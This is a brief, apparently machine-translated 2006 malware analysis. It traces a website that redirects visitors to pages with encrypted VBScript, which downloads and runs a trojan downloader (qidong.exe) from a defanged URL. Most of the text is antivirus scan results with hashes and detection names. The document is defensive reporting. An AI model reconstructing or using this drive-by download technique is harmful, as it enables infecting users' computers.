EndurerOriginal
2006-09-062Version
2006-09-02 No.1Version
The website hxxp: // www.94l **** m.com/homepage opens the webpage based on the cookie value:
/------------
Hxxp: // www. Dudu ** {com/web/dudu?###13.htm
------------/
Or
/------------
Hxxp: // www. Dud ** uw.com/web/dudu??#=12.htm
------------/
Dudu ***** 13.htm and Dudu ***** have encrypted VBScript code in 12.htm. XMLHTTP and scripting. fileSystemObject downloads hxxp: // qidong.virussky.com/qidong.exe, saves it as an85.com in the temporary ie folder, and uses shell. the ShellExecute method of the Application object to run.
File: |
Qidong.exe |
Status: |
Infected/malware |
MD5 |
F932ee7f241695d5ee6527a231795468 |
Packers detected: |
UPX |
Scanner results |
AntiVir |
FoundHeuristic/malware (probable variant) |
Arcavir |
Found nothing |
Avast |
Found nothing |
AVG AntiVirus |
Found nothing |
BitDefender |
FoundGeneric. malware. Be! G.66e35076 |
ClamAV |
Found nothing |
Dr. Web |
FoundTrojan. Update |
F-Prot AntiVirus |
Found nothing |
Fortinet |
Found nothing |
Kaspersky Anti-Virus |
FoundTrojan-Downloader.Win32.Agent.aqr |
NOD32 |
Found probably unknownNewheur_pe(Probable variant) |
Norman Virus Control |
Found nothing |
Una |
Found nothing |
Virusbuster |
Found nothing |
Vba32 |
Found nothing |
Antivirus |
Version |
Update |
Result |
AntiVir |
7.1.1.11 |
09.06.2006 |
TR/dldr. Agent. aqr.15 |
Authentium |
4.93.8 |
09.06.2006 |
No virus found |
Avast |
4.7.844.0 |
09.06.2006 |
No virus found |
AVG |
386 |
09.06.2006 |
Downloader. Agent. fgl |
BitDefender |
7.2 |
09.06.2006 |
Generic. malware. Be! G.66e35076 |
Cat-quickheal |
8.00 |
09.05.2006 |
No virus found |
ClamAV |
Devel-20060426 |
09.06.2006 |
No virus found |
Drweb |
4.33 |
09.06.2006 |
Trojan. Update |
ETrust-inoculateit |
23.72.117 |
09.05.2006 |
No virus found |
ETrust-vet |
30.3.3064 |
09.06.2006 |
No virus found |
Ewido |
4.0 |
09.05.2006 |
Downloader. Agent. aqr |
Fortinet |
2.77.0.0 |
09.06.2006 |
No virus found |
F-Prot |
3.16f |
09.06.2006 |
No virus found |
F-Prot4 |
4.2.1.29 |
09.06.2006 |
No virus found |
Ikarus |
0.2.65.0 |
09.06.2006 |
No virus found |
Kaspersky |
4.0.2.24 |
09.06.2006 |
Trojan-Downloader.Win32.Agent.aqr |
McAfee |
4845 |
09.05.2006 |
Downloader-awe |
Microsoft |
1.1560 |
09.06.2006 |
No virus found |
Nod32v2 |
1.1741 |
09.06.2006 |
Probably unknown newheur_pe Virus |
Norman |
5.90.23 |
09.06.2006 |
No virus found |
Panda |
9.0.0.4 |
09.05.2006 |
Trj/Delf. ABZ |
Sophos |
4.09.0 |
09.06.2006 |
No virus found |
Symantec |
8.0 |
09.06.2006 |
No virus found |
Thehacker |
5.9.8.205 |
09.06.2006 |
Posible_worm322 |
Una |
1.83 |
09.06.2006 |
No virus found |
Vba32 |
3.11.1 |
09.05.2006 |
Trojan-Downloader.Win32.Agent.aqr |
Virusbuster |
4.3.7: 9 |
09.06.2006 |
No virus found |
Aditional Information |
File Size: 31744 bytes |
MD5: f932ee7f241695d5ee6527a231795468 |
Sha1: 6414ec3d64ede47a4eec4cd07166380b223431da |
Packers: UPX, embedded |